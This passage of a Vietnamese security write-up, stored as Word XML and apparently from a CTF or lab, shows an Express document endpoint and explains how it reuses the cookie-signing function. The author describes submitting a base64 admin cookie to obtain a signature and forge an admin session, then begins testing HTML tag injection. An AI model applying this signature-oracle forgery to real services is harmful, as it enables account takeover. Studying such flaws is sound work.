          <w:p w14:paraId="5409D8FC" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00BB1961" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:r w:rsidRPr="00BB1961">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18D62D84" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00BB1961" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:r w:rsidRPr="00BB1961">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B9CDEFE" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00BB1961" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:r w:rsidRPr="00BB1961">
              <w:lastRenderedPageBreak/>
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C239F65" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00BB1961" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:r w:rsidRPr="00BB1961">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DA6DFE5" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00BB1961" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:r w:rsidRPr="00BB1961">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05E85E4A" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00BB1961" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:r w:rsidRPr="00BB1961">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E75E75E" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00BB1961" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:r w:rsidRPr="00BB1961">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C39DA9D" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00BB1961" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:r w:rsidRPr="00BB1961">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62848E3A" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00BB1961" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:r w:rsidRPr="00BB1961">
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12513511" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00BB1961" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:r w:rsidRPr="00BB1961">
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="506D9987" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00BB1961" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:r w:rsidRPr="00BB1961">
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17A7AD68" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00157097" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>router.post("/documents", isAuthenticated, (req, res) =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16B42EB3" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00157097" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> { content } = req.body;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19703A2F" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00157097" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> user = req.user;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0174D68C" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00157097" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7A57788C" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00157097" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> (!content || </w:t>
            </w:r>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>typeof</w:t>
            </w:r>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> content !== "string") {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08B87BD7" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00157097" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> res.send("Bad document content oO, make sure it's not empty");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28739231" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00157097" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74BC2648" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00157097" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7115991B" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00157097" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> sanitizedContent = sanitizeHtml(content, {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="649F91E0" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00157097" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">    allowedAttributes: {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58AC1BF6" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00157097" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">      ...sanitizeHtml.defaults.allowedAttributes,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DB9812F" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00157097" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">      a: ["style"],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="309DD998" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00157097" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">    },</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32B156D0" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00157097" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">  });</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="585C450C" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00157097" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="66D1D53E" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00157097" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> integrity = signString(content);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AEE9D58" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00157097" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">  addDocument(user.id, sanitizedContent, integrity);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F16E912" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00157097" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> res.redirect(`/documents`);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CF848E8" w14:textId="77777777" w:rsidR="00BB1961" w:rsidRPr="00157097" w:rsidRDefault="00BB1961" w:rsidP="00BB1961">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00157097">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>});</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="179112CE" w14:textId="77777777" w:rsidR="00105C2F" w:rsidRDefault="00105C2F"/>
    <w:p w14:paraId="7BA19108" w14:textId="5F39518B" w:rsidR="00105C2F" w:rsidRDefault="00577675" w:rsidP="009220FC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00577675">
        <w:t xml:space="preserve">Endpoint </w:t>
      </w:r>
      <w:r>
        <w:t>đ</w:t>
      </w:r>
      <w:r w:rsidR="00105C2F">
        <w:t xml:space="preserve">ã sử dụng thư viện </w:t>
      </w:r>
      <w:r w:rsidR="006D3E2C">
        <w:t>sanitize-html</w:t>
      </w:r>
      <w:r w:rsidR="00105C2F">
        <w:t xml:space="preserve"> để làm sạch nội dung đầu vào từ người dùng. Đây là bước quan trọng để loại bỏ các thẻ HTML nguy </w:t>
      </w:r>
      <w:r w:rsidR="004A00D3">
        <w:t xml:space="preserve">hiểm. </w:t>
      </w:r>
      <w:r w:rsidR="006D3E2C" w:rsidRPr="006D3E2C">
        <w:t>Cấu hình của thư viện cho phép giữ nguyên các thuộc tính mặc định an toàn,</w:t>
      </w:r>
      <w:r w:rsidR="006D3E2C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009220FC">
        <w:t>đồng thời</w:t>
      </w:r>
      <w:r w:rsidR="004A00D3">
        <w:t xml:space="preserve"> ta</w:t>
      </w:r>
      <w:r w:rsidR="00105C2F">
        <w:t xml:space="preserve"> chỉ cho phép thuộc tính trong thẻ </w:t>
      </w:r>
      <w:r w:rsidR="004A00D3">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00105C2F">
        <w:t xml:space="preserve">, và </w:t>
      </w:r>
      <w:r w:rsidR="00EC444A" w:rsidRPr="00EC444A">
        <w:t>bổ sung thuộc tính</w:t>
      </w:r>
      <w:r w:rsidR="00EC444A">
        <w:t xml:space="preserve"> style cho nó</w:t>
      </w:r>
      <w:r w:rsidR="00105C2F">
        <w:t xml:space="preserve">. Điều này giúp hạn chế các thuộc tính nguy </w:t>
      </w:r>
      <w:r w:rsidR="004A00D3">
        <w:t>hiểm gây xss.</w:t>
      </w:r>
      <w:r w:rsidR="00EC444A">
        <w:t xml:space="preserve"> Tuy nhiên </w:t>
      </w:r>
      <w:r w:rsidR="007977C2">
        <w:t xml:space="preserve">chức năng tạo chữ ký từ nội dung lại sử dụng cùng hàm tạo chữ kí với </w:t>
      </w:r>
      <w:r w:rsidR="00644440">
        <w:t xml:space="preserve">cookie. Đây là một điểm yếu khá mạnh khi mà chúng ta chỉ cần đưa mã base64 của thông tin người dùng vào là có thể tạo ra chữ ký, từ đó giả mạo được cookie của người dùng </w:t>
      </w:r>
      <w:r w:rsidR="006B2131">
        <w:t>admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF0EA9F" w14:textId="149373A9" w:rsidR="006B2131" w:rsidRDefault="006B2131" w:rsidP="009220FC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thực hiện mã hóa </w:t>
      </w:r>
      <w:r w:rsidR="00623578">
        <w:t>base64 của cookie với username là admin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEACF33" w14:textId="338B21EF" w:rsidR="00742F6E" w:rsidRDefault="00D474B7">
      <w:r w:rsidRPr="00D474B7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44CA2AAD" wp14:editId="39566B49">
            <wp:extent cx="5707380" cy="1299210"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="1222500975" name="Picture 1" descr="A white rectangular object with a black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500975" name="Picture 1" descr="A white rectangular object with a black line&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId11"/>
                    <a:srcRect l="1596"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5707380" cy="1299210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B95136" w14:textId="44A4F707" w:rsidR="00623578" w:rsidRDefault="00623578">
      <w:r>
        <w:t>Tạo 1 tài liệu mới với mã base64 vừa tạo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726BF8C7" w14:textId="14FB2D0C" w:rsidR="001154C6" w:rsidRDefault="001154C6">
      <w:r w:rsidRPr="001154C6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02FBD445" wp14:editId="665979F8">
            <wp:extent cx="5731510" cy="2409190"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="149800693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006930" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2409190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="795AD0B1" w14:textId="77777777" w:rsidR="00623578" w:rsidRDefault="00623578"/>
    <w:p w14:paraId="5890D7F4" w14:textId="1E2F2C09" w:rsidR="00623578" w:rsidRDefault="00623578">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Thành công có được chữ ký:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F82086" w14:textId="271B8AA1" w:rsidR="006C29DA" w:rsidRDefault="009217E4">
      <w:r w:rsidRPr="009217E4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39B7A05B" wp14:editId="55F6C43E">
            <wp:extent cx="5731510" cy="2483485"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="169094742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947421" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2483485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6317F073" w14:textId="7920ED1E" w:rsidR="00623578" w:rsidRDefault="00623578">
      <w:r>
        <w:t>Sử dụng chữ ký nhận được để tạo cookie giả mạo và truy cập thành công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC0E5B8" w14:textId="0317D79C" w:rsidR="00D474B7" w:rsidRDefault="00D474B7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44B7384A" wp14:editId="5A42144C">
            <wp:extent cx="5731510" cy="2654300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="5604894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489404" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2654300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="445B632A" w14:textId="15DA4DB3" w:rsidR="00623578" w:rsidRDefault="00623578">
      <w:r>
        <w:t>File pdf đã được tải về thành công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F63BB0" w14:textId="13AF5217" w:rsidR="00E06E5C" w:rsidRDefault="00E06E5C">
      <w:r w:rsidRPr="00E06E5C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47ECFD3E" wp14:editId="08454997">
            <wp:extent cx="5731510" cy="1178560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="1473148916" name="Picture 1" descr="A black and white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148916" name="Picture 1" descr="A black and white screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1178560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFB19E4" w14:textId="77777777" w:rsidR="00623578" w:rsidRDefault="00623578"/>
    <w:p w14:paraId="02A34987" w14:textId="77777777" w:rsidR="00623578" w:rsidRDefault="00623578"/>
    <w:p w14:paraId="71EBAB50" w14:textId="77777777" w:rsidR="00623578" w:rsidRDefault="00623578"/>
    <w:p w14:paraId="2AB3E90A" w14:textId="77777777" w:rsidR="00623578" w:rsidRDefault="00623578"/>
    <w:p w14:paraId="3E3A6303" w14:textId="77777777" w:rsidR="00623578" w:rsidRDefault="00623578"/>
    <w:p w14:paraId="62A5C4F6" w14:textId="11DC3106" w:rsidR="00623578" w:rsidRDefault="00623578">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>File pdf được tải về chứa nội dung vừa được tạo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500BD690" w14:textId="191CC1F4" w:rsidR="00E06E5C" w:rsidRDefault="00E06E5C">
      <w:r w:rsidRPr="00E06E5C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F4976EB" wp14:editId="04B3287F">
            <wp:extent cx="5731510" cy="1774190"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="204352086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520866" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1774190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A549BC4" w14:textId="2E187BE4" w:rsidR="00623578" w:rsidRDefault="00623578">
      <w:r>
        <w:t xml:space="preserve">Tuy chức năng đã sử dụng </w:t>
      </w:r>
      <w:r>
        <w:t>thư viện sanitize-html để làm sạch nội dung đầu vào từ người dùng</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nhưng mình vẫn sẽ thử nghiệm đưa một vài thẻ vào:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3279B1E9" w14:textId="673326D8" w:rsidR="00731EE3" w:rsidRDefault="00623578">
      <w:r>
        <w:t>Sử dụng thẻ không có khả năng khai thác h1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574F0C67" w14:textId="7D6B03AA" w:rsidR="00731EE3" w:rsidRDefault="00731EE3">
      <w:r w:rsidRPr="00731EE3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D788546" wp14:editId="11F03B15">
            <wp:extent cx="5731510" cy="947420"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1865986073"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986073" name="Picture 1" descr="A black screen with white text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="947420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="570F6AAF" w14:textId="4065576D" w:rsidR="00623578" w:rsidRDefault="00623578">
      <w:r>
        <w:t>Thẻ được đưa thành công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1843D0D2" w14:textId="17115DB6" w:rsidR="00731EE3" w:rsidRDefault="00731EE3">
      <w:r w:rsidRPr="00731EE3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1044C572" wp14:editId="0669AA2C">
            <wp:extent cx="5731510" cy="570230"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="947784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784893" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="570230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
